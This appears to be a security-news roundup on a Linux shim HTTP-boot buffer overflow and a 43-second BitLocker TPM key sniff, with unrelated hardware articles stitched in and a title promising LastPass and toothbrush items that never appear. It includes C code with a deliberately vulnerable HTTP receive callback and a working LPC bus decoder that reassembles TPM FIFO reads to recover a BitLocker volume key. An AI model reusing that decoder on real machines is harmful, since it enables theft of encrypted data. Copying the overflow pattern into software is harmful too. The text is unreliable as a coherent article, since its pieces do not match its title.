This Week In Security: Broken Shims, LassPass, And Toothbrushes?

Linux has a shim problem. Which naturally leads to a reasonable question: What’s a shim, and why do we need it? The answer: making Linux work with Secure Boot, and an unintended quirk of the GPLv3.

Secure Boot is the UEFI firmware’s verification scheme, present in modern machines, that only lets boot components signed by a trusted key run. When Secure Boot was first introduced, many Linux fans suggested it was little more than an attempt to keep Linux distros off of consumers’ machines. That fear seems to have been unwarranted, as Microsoft has dutifully kept the Linux shim signed, so we can all run Linux distros on our Secure Boot machines.

So, the shim. It’s essentially a first-stage bootloader that Microsoft signs, and which in turn verifies and boots a signed GRUB2 or other target. You might ask why we can’t just ask Microsoft to sign GRUB2 directly, and that’s where the GPLv3 comes in. That license has an “anti-tivoization” section, which makes “Installation Information” part of what must be provided for GPLv3 compliance, and Microsoft’s legal team understands that requirement to apply even to this signing process. Releasing the signing keys would totally defeat the point of Secure Boot, so no GPLv3 code gets signed by Microsoft. Instead, we get the shim, which carries its own certificate for verifying what it loads.

Now that we understand the shim, let’s cover how it’s broken. The most serious vulnerability is a buffer overflow in the HTTP file transfer code. The buffer is allocated based on the size in the HTTP header, but a malicious HTTP server can set that value incorrectly, and the shim code would happily write the real HTTP contents past the end of that buffer, leading to arbitrary code execution. You might ask, why in the world does the shim have HTTP code in it at all? The simple answer is to support UEFI HTTP Boot, a replacement for PXE boot.

The good news is that this vulnerability can only be triggered when using HTTP boot, and only by connecting to a malicious server or by a man-in-the-middle attack on the boot-time HTTP connection. With this in mind, it’s odd that this vulnerability is rated CVSS 9.8. Specifically, it seems incorrect that this bug is rated as low attack complexity with a network attack vector. In Red Hat’s own write-up of the vulnerability, they argue that exploitation is high complexity and is only possible from an adjacent network. There were a handful of lesser vulnerabilities found as well, and these were all fixed in shim 15.8. One caveat worth remembering: because the shim is what Secure Boot trusts, installing the patched shim only helps once the old, vulnerable binary is also revoked (via the firmware’s dbx or shim’s SBAT generation), otherwise an attacker can simply boot the old signed copy.
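The bug class described above, as an added example that is not the shim’s own code and is not taken from the advisory: a receive callback that sizes its buffer from Content-Length but copies whatever the server actually sends, next to the bounded version that refuses more body than the allocation can hold. The HTTP responses, the 48-byte payload, the 64-byte arena and the canary byte are all constructed for the demo; the arena exists so the overrun lands in memory the program owns and can be inspected, rather than being undefined behaviour.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Download state: one buffer whose capacity came from the Content-Length header. */
typedef struct {
    uint8_t *buf;
    size_t   cap;   /* bytes allocated, taken from Content-Length */
    size_t   used;  /* body bytes stored so far */
} dl_ctx;

/* Pull Content-Length out of a response header block; -1 if missing. */
static long parse_content_length(const char *hdrs)
{
    const char *p = strstr(hdrs, "Content-Length:");
    if (p == NULL)
        return -1;
    return strtol(p + strlen("Content-Length:"), NULL, 10);
}

/* Vulnerable pattern: the allocation trusted the header, the copy trusts the wire.
 * A server that declares 16 bytes and then sends 48 writes 32 bytes past buf. */
static int recv_body_vuln(dl_ctx *c, const uint8_t *chunk, size_t n)
{
    memcpy(c->buf + c->used, chunk, n);   /* no comparison against c->cap */
    c->used += n;
    return 0;
}

/* Hardened form: every copy is bounded by what was actually allocated, and a
 * server that sends more than it declared gets the transfer aborted. */
static int recv_body_fixed(dl_ctx *c, const uint8_t *chunk, size_t n)
{
    if (n > c->cap - c->used)
        return -1;
    memcpy(c->buf + c->used, chunk, n);
    c->used += n;
    return 0;
}

#define ARENA  64
#define CANARY 0xA5

typedef int (*recv_fn)(dl_ctx *, const uint8_t *, size_t);

/* Run one download into a local arena: the header-sized buffer sits at the
 * front and everything behind it is filled with a canary, so an overrun stays
 * inside memory we own and shows up as a clobbered canary.
 * Returns the callback's result; *intact reports whether the canary survived. */
static int run_download(recv_fn cb, const char *hdrs,
                        const uint8_t *body, size_t body_len, int *intact)
{
    uint8_t arena[ARENA];
    memset(arena, CANARY, sizeof arena);
    long cl = parse_content_length(hdrs);
    if (cl < 0 || (size_t)cl > ARENA || body_len > ARENA)   /* keep the demo in bounds */
        return -2;
    dl_ctx c = { arena, (size_t)cl, 0 };
    int rc = cb(&c, body, body_len);
    *intact = 1;
    for (size_t i = c.cap; i < ARENA; i++)
        if (arena[i] != CANARY)
            *intact = 0;
    return rc;
}

/* Constructed exchanges: the malicious server declares 16 bytes and sends 48. */
static const char good_hdrs[] = "HTTP/1.1 200 OK\r\nContent-Length: 48\r\n\r\n";
static const char evil_hdrs[] = "HTTP/1.1 200 OK\r\nContent-Length: 16\r\n\r\n";

/* Returns 1 when the body was accepted and memory is intact, 0 when the body
 * was accepted but overran the buffer, -1 when the receiver aborted. */
int shim_http_demo(int hardened, int malicious)
{
    uint8_t body[48];
    memset(body, 0x41, sizeof body);   /* constructed payload */
    int intact = 0;
    int rc = run_download(hardened ? recv_body_fixed : recv_body_vuln,
                          malicious ? evil_hdrs : good_hdrs,
                          body, sizeof body, &intact);
    if (rc != 0)
        return -1;
    return intact ? 1 : 0;
}

int main(void)
{
    printf("vulnerable, honest server:    %d\n", shim_http_demo(0, 0));
    printf("vulnerable, malicious server: %d\n", shim_http_demo(0, 1));
    printf("fixed, malicious server:      %d\n", shim_http_demo(1, 1));
    return 0;
}
```

The single check in recv_body_fixed is the whole fix: the body length the server chooses to send is attacker-controlled input and has to be compared against the capacity that was actually allocated, never against the header the same server supplied.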

Power Supply Efficiency Measurements

Even if you don’t have a Rohde & Schwarz oscilloscope, you can still enjoy their recent video about using an oscilloscope to measure power supply efficiency. Of course, you don’t have to have a scope to do this. You can use a voltmeter and an ammeter, but it is very straightforward if you have a four-channel scope with a pair of current probes.

Of course, if you can measure the voltage and the current at the input, you can calculate the input power, and most scopes these days can do the math for you, multiplying the two waveforms sample by sample and averaging the result, which gives true power even when the current isn’t clean DC. Then you make the same measurement and calculation at the output. Divide output power by input power and you have the efficiency as a percentage, or let the scope do that for you too.


Friendly Flexible Circuits: The Cables

Flexible cables and flex PCBs are wonderful. You could choose to carefully make a cable bundle out of ten wires and try to squish them to have a thin footprint – or you could put an FFC connector onto your board and save yourself a world of trouble. If you want to have a lot of components within a cramped non-flat area, you could carefully design a multitude of stuffed FR4 boards and connect them together – or you could make an FPC.

Flexible cables in particular can be pretty wonderful for all sorts of moving parts. They transfer power and data to the scanner head in your flat-bed scanner, for instance. But they’re in fixed parts too. If you have a laptop or a widescreen TV, chances are, there’s a flexible cable connecting the motherboard with one or multiple daughterboards – or even a custom-made flexible PCB. Remember all the cool keypad phones we used to have, the ones that would have the keyboard fold out or slide out, or even folding Nokia phones that had two screens and did cool things with those? All thanks to flexible circuits! Let’s learn a little more about what we’re working with here.

FFC and FPC, how are these two different? FFC (Flexible Flat Cable) is a pre-made cable. You’ve typically seen them as white plastic cables with blue pieces on both ends, they’re found in a large number of devices that you could disassemble, and many things use them, like the Raspberry Pi Camera. They are pretty simple to produce – all in all, they’re just flat straight conductors packaged nicely into a very thin cable, and that’s why you can buy them pre-made in tons of different pin pitches and sizes. If you need one board to interface with another board, putting an FFC connector on your board is a pretty good idea.


Harbor Freight And LEGO PCB Vise Is Cheap And Effective

It doesn’t take much chasing things around the bench with a soldering iron to appreciate the value of good work holding. And don’t get us started on those cheap “helping hands” alligator clip thingies; they’re somehow worse than no work holding. Isn’t there a better way?

Maybe, judging by [Paul Bryson]’s idea for a dirt cheap PCB vise. It’s a pretty clever design that’ll have you heading to Harbor Freight, or whatever the moral equivalent is in your location, where you’ll pick up a small ratcheting bar clamp. [Paul] used a 4″ (10 cm) clamp, which looks fine for a wide range of boards, but we suppose you could go bigger if you like. You could also stop there and just clamp your PCBs in the plastic jaws, but [Paul] adorned the jaws with swiveling arms made from LEGO Technic pieces, of all things. Rubber grommets slipped onto Technic pegs go into the holes on the beam to hold the PCB edges firmly, while the swiveling action adapts to odd-shaped boards.

To our mind, the biggest advantage to this design other than cost is how low it holds the PCB — a decided advantage while working under the microscope. Don’t have any Technic parts close to hand? No worries, 3D printed parts could easily stand in, and maybe even improve the design. [Paul] also shows off a substitute for the Technic beam rendered in PCB material, which would reduce the height of the workpiece over the bench even more.

We’ve seen a lot of PCB vises come and go, using everything from scrap wood to 3D printed compliant mechanisms. But we doubt you’ll find anything more cost-effective than [Paul]’s design.

Recreating The Quadrophonic Sound Of The 70s

For plenty of media center PCs, home theaters, and people with a simple TV and a decent audio system, the standard speaker setup now is 5.1 surround sound: left and right speakers in the front and back, with a center speaker and a subwoofer. But the 5.1 setup wasn’t always the standard (and still isn’t the only standard); after stereo was adopted mid-century, audio engineers wanted more than just two channels and briefly attempted a four-channel system called quadrophonic sound. There’s still some media from the 70s built for this system, such as [Alan]’s collection of 8-track tapes. These tapes are getting along in years, so he built a quadrophonic 8-track replica to keep the experience alive.

The first thing needed for a replica system like this is the digital quadrophonic audio files themselves. Since the format died in the late 70s, there’s not a lot available in modern times, so [Alan] has a dedicated 8-track player connected to a four-channel audio-to-USB interface to digitize his own collection of quadrophonic 8-track tapes. Every play wears the decades-old tapes a little more, so capturing them once is very much necessary.

With the audio files captured, he needs something to play them back with. A Raspberry Pi is put to the task, but it needs a special sound card in order to play back the four channels simultaneously. To preserve the feel of an antique 8-track player he’s cannibalized parts from three broken players to keep the cartridge loading mechanism and track indicator display, along with a VU meter for each of the four channels. A QR code reader inside the device reads a QR code on the replica 8-track cartridges when they are inserted, which prompts the Pi to play the correct audio file, and a series of buttons along with a screen on the front can be used to fast forward, rewind and pause. A solenoid inside the device preserves the “clunk” sound typical of real 8-track players.

As a replica, this player goes to great lengths to preserve the essence of not only the 8-track era, but the brief quadrophonic frenzy of the early and mid 70s. There’s not a lot of activity around quadrophonic sound anymore, but 8-tracks are popular targets for builds and restorations, and a few that go beyond audio including this project that uses one for computer memory instead.


Beating Bitlocker In 43 Seconds

How long does it take to steal your BitLocker keys? Try 43 seconds, using less than $10 in hardware. Encrypting your hard drive is good security. If you’re running Windows, the most popular system is BitLocker, which has shipped with Windows since Vista. We’ve known for some time that BitLocker in its default TPM-only configuration could be defeated with direct access to the hardware. Microsoft’s position is that the process requires a skilled attacker with lengthy access to the hardware. [Stacksmashing] wanted to define lengthy, so he gave it a try. The result is a shockingly fast attack.

Anyone who uses Windows has probably run into BitLocker. Your hard drive is encrypted, and BitLocker runs silently in the background, decrypting data on demand. The problem is key storage. In a simplified sense, the volume key is sealed to the Trusted Platform Module (TPM), which releases it only when the measured boot state matches what it was sealed against. When your computer boots, it reads the key from the TPM over the LPC (Low Pin Count) bus, which is one of the last remnants of the original ISA bus, and with a discrete TPM that transfer happens in the clear. Anyone who can clip onto those bus lines can therefore watch the key go by, which is exactly what this attack does. Requiring a PIN in addition to the TPM stops this particular trick, since the TPM won’t release the key until the PIN is entered.
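To make the “reads the key over the LPC bus” part concrete, here is an added example, my own and not [Stacksmashing]’s tool, that decodes a constructed LPC capture into TPM register reads and reassembles the bytes the host pulled from the TPM’s data FIFO. The nibble framing (START 0101 for TPM-specific cycles with a 16-bit address, CYCTYPE+DIR, TAR, SYNC, DATA) follows the LPC 1.1 and TCG TIS specifications as I know them, and the register offsets are the TIS locality-0 ones; the sample capture and the 32-byte test key are constructed, and the TPM 2.0 Unseal response layout is an assumption made for the demo.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* TPM TIS (FIFO interface) register offsets, locality 0. On the LPC bus these
 * sit in the 0xFED4xxxx window; TPM-specific cycles carry just the low 16 bits. */
#define TPM_STS_0        0x0018
#define TPM_DATA_FIFO_0  0x0024
#define KEY_LEN          32
#define SAMPLES_PER_READ 13

/* One sample per LCLK: LFRAME# level and the four LAD lines. */
typedef struct { uint8_t lframe_n; uint8_t lad; } lpc_sample;

/* Constructed 32-byte test key standing in for the VMK; not a real key. */
static const uint8_t demo_vmk[KEY_LEN] = {
    0x13,0x37,0xc0,0xde,0xde,0xad,0xbe,0xef,0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,
    0x88,0x99,0xaa,0xbb,0xcc,0xdd,0xee,0xff,0x0f,0x1e,0x2d,0x3c,0x4b,0x5a,0x69,0x78 };

/* Encode one TPM-cycle read as the samples a sniffer would record. Framing as
 * assumed from LPC 1.1 / TCG TIS: START 0101, CYCTYPE+DIR 0100 (memory read),
 * ADDR x4 MSB first, TAR x2, SYNC 0000, DATA x2 low nibble first, TAR x2. */
static size_t emit_tpm_read(lpc_sample *out, uint16_t addr, uint8_t val)
{
    size_t n = 0;
    out[n++] = (lpc_sample){0, 0x5};            /* START, LFRAME# asserted */
    out[n++] = (lpc_sample){1, 0x4};            /* memory read */
    for (int i = 3; i >= 0; i--)
        out[n++] = (lpc_sample){1, (uint8_t)((addr >> (4 * i)) & 0xF)};
    out[n++] = (lpc_sample){1, 0xF};            /* TAR: bus handed to the TPM */
    out[n++] = (lpc_sample){1, 0xF};
    out[n++] = (lpc_sample){1, 0x0};            /* SYNC: ready */
    out[n++] = (lpc_sample){1, (uint8_t)(val & 0xF)};
    out[n++] = (lpc_sample){1, (uint8_t)(val >> 4)};
    out[n++] = (lpc_sample){1, 0xF};            /* TAR: bus back to the host */
    out[n++] = (lpc_sample){1, 0xF};
    return n;
}

/* Walk a capture, decode every TPM read cycle, and keep the bytes the host
 * pulled from TPM_DATA_FIFO_0. Status polls and write cycles are skipped. */
static size_t extract_fifo_reads(const lpc_sample *s, size_t n,
                                 uint8_t *fifo, size_t cap)
{
    size_t got = 0, i = 0;
    while (i + 5 < n) {
        if (s[i].lframe_n != 0 || s[i].lad != 0x5 || s[i + 1].lad != 0x4) { i++; continue; }
        uint16_t addr = 0;
        for (int k = 0; k < 4; k++)
            addr = (uint16_t)((addr << 4) | s[i + 2 + k].lad);
        size_t j = i + 8;                        /* first SYNC nibble, after TAR */
        while (j < n && (s[j].lad == 0x5 || s[j].lad == 0x6))
            j++;                                 /* short/long wait states */
        if (j + 2 >= n || s[j].lad != 0x0) { i++; continue; }
        uint8_t val = (uint8_t)(s[j + 1].lad | (s[j + 2].lad << 4));
        if (addr == TPM_DATA_FIFO_0 && got < cap)
            fifo[got++] = val;
        i = j + 3;
    }
    return got;
}

/* Boot-time traffic as constructed for the demo: the driver polls TPM_STS_0
 * and drains a TPM 2.0 Unseal response (10-byte header, then a TPM2B holding
 * the key) from the FIFO one byte at a time. The response layout is an assumption. */
static size_t build_capture(lpc_sample *out)
{
    uint8_t resp[12 + KEY_LEN] = { 0x80, 0x01, 0, 0, 0, 12 + KEY_LEN,
                                   0, 0, 0, 0, 0, KEY_LEN };
    memcpy(resp + 12, demo_vmk, KEY_LEN);
    size_t n = 0;
    for (size_t k = 0; k < sizeof resp; k++) {
        if (k % 8 == 0)
            n += emit_tpm_read(out + n, TPM_STS_0, 0x90);   /* stsValid | dataAvail */
        n += emit_tpm_read(out + n, TPM_DATA_FIFO_0, resp[k]);
    }
    return n;
}

/* Parse the reassembled FIFO stream as a TPM 2.0 response and copy out the key. */
static int recover_key(const uint8_t *f, size_t len, uint8_t key[KEY_LEN])
{
    if (len < 12 + KEY_LEN || f[0] != 0x80 || f[1] != 0x01)   /* TPM_ST_NO_SESSIONS */
        return 0;
    uint32_t size = (uint32_t)f[2] << 24 | (uint32_t)f[3] << 16 | (uint32_t)f[4] << 8 | f[5];
    uint32_t rc   = (uint32_t)f[6] << 24 | (uint32_t)f[7] << 16 | (uint32_t)f[8] << 8 | f[9];
    uint16_t dlen = (uint16_t)(f[10] << 8 | f[11]);
    if (size != len || rc != 0 || dlen != KEY_LEN)
        return 0;
    memcpy(key, f + 12, KEY_LEN);
    return 1;
}

/* End to end: sniff, reassemble, recover. Returns 1 if the recovered key is
 * byte-for-byte the one the TPM handed out, which is the whole point. */
int sniff_demo(void)
{
    static lpc_sample cap[64 * SAMPLES_PER_READ];
    uint8_t fifo[64], key[KEY_LEN];
    size_t got = extract_fifo_reads(cap, build_capture(cap), fifo, sizeof fifo);
    return recover_key(fifo, got, key) && memcmp(key, demo_vmk, KEY_LEN) == 0;
}
```

Nothing in this pipeline needs a secret: the sniffer only has to tell reads from status polls and put the FIFO bytes back in order, because the TPM’s answer to the unseal request is sent as plain bytes on a bus a logic analyzer or a Pico can watch. A real capture will also contain wait states and the command bytes the host wrote into the same FIFO, which the decoder above deliberately ignores.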


Retrotechtacular: The Master Hands Of The Early Automotive Industry

When motion pictures came along as a major medium in the 1920s or so, it didn’t take long for corporations to recognize their power and start producing promotional pieces. A lot of them are of the “march of progress” genre, featuring swarms of workers happy in their labors and creating the future with their bare hands. If we’re being honest, a lot of it is hard to watch, but “Master Hands,” which shows the creation of cars in the 1930s, is somehow more palatable, mostly because it’s mercifully free of the flowery narration that usually accompanies such flicks.

“Master Hands” was produced in 1936 and focuses on the incredibly labor-intensive process of turning out cars, which appear to be the Chevrolet Master Deluxe, likely the 1937 model year thanks to its independent front suspension. The film is set at General Motors’ Flint Assembly plant in Flint, Michigan, and shows the entire manufacturing process from start to finish. And by start, we mean start; the film begins with the meticulous work of master toolmakers creating the dies and molds needed for forging and casting every part of the car. The mold makers and foundrymen come next, lighting their massive furnaces and packing the countless sand molds needed for casting parts. Gigantic presses stamp out everything from wheels to frame rails to body panels, before everything comes together at the end of the line in a delicate ballet of steel and men.
